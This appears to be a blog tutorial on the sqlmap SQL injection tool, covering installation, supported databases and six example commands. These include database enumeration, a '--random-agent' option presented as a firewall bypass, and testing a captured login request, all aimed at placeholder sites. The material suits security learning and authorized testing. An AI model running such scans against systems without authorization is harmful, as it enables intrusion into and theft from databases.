Quick Tutorial - Identify SQL Injection vulnerability with sqlmap

sqlmap is a python based penetration testing tool that automates the process of identifying SQL injection vulnerability and helps in compromise the database servers. This automated tool is very helpful and reduces the effort in finding SQL injection flaws in an application. This tutorial helps in understanding the sqlmap tool and also equipped you for running the first SQL injection test by using the sqlmap.

Installation

This tool is pre-installed on most penetration testing operating systems such as Kali Linux, Parrot etc. Although sqlmap can be installed on Linux based OS by using the below command:

 sudo apt-get install sqlmap 

Although you need to install python to run this tool by using the below command:

sudo apt-get install python3

You can check the installation of python by just displaying the help options.

python -V

What does sqlmap do?

sqlmap automates the whole process of manually checking SQL injection vulnerability. This tool supports in identifying vulnerabilities of six types as mentioned below:

  1. boolean-based blind
  2. UNION query-based
  3. time-based blind
  4. out-of-band
  5. error-based
  6. stacked queries

Supported DBMS by sqlmap

MySQLYugabyteDB PostgreSQLFrontBaseeXtremeDBMckoi
Virtuoso OracleRaima Database ManagerMicrosoft SQL ServerMicrosoft AccessIBM DB2
Amazon RedshiftApache DerbyMariaDBPrestoTiDBVertica
InterSystems CacheH2SAP MaxDBCockroachDBInformixCubrid
DrizzleHSQLDBAltibaseApache IgniteCrateDBGreenplum
FirebirdMimerSQLSQLiteMemSQLMonetDBIRIS

How to use sqlmap tool effectively

There are a lot of options available to utilize the sqlmap tool very effectively. This blog list out basic commands that is awesome to start with sqlmap and test the application for SQL injection vulnerability.

Examples

(1) First scan using -u option

You can sqlmap tool just like any other command-line tool. It is extremely easy to use. You need to just shoot the query as mentioned below:

sqlmap -u testsite.com/index.php?id=1

(2) To identify databases list by using --dbs option

sqlmap.py -u "http://www.testsite.com/test.php?id=87" --dbs

(3) Get help

sqlmap --help

(4) Bypass Firewall

Users can use --random-agent option to try as a different random agent and in turn bypass firewall

sqlmap -u "http://testsite.com/test.php?id=50" --random-agent

(5) Test target with more payloads

The below script tests the application in more depth by bombard with more SQL injection payloads.

sqlmap -u "https://testsite.com/index.php?web=aat" --risk=2 --level=5

(6) Test POST Request

You can also use sqlmap tool on POST requests. Suppose you want to test the login functionality of the application for the username field. The attacker intercepts the login request and saves it in a file login.txt. Then use sqlmap tool to identify vulnerability.

sqlmap -r /login.txt -p "username" --threads 10 --dbs

Here -r indicates request and -p indicates test parameter.

Conclusion

sqlmap is a well-maintained tool by the open-source community and one of the most reliable tools to identify sql injection vulnerabilities in a web application. This tool supports huge range of databases and other different enumerations. If you have not used this tool yet, I highly recommend using this tool against the target.

Subscribe us to receive more such articles updates in your email.

If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

You may also like...

Leave a Reply

Your email address will not be published.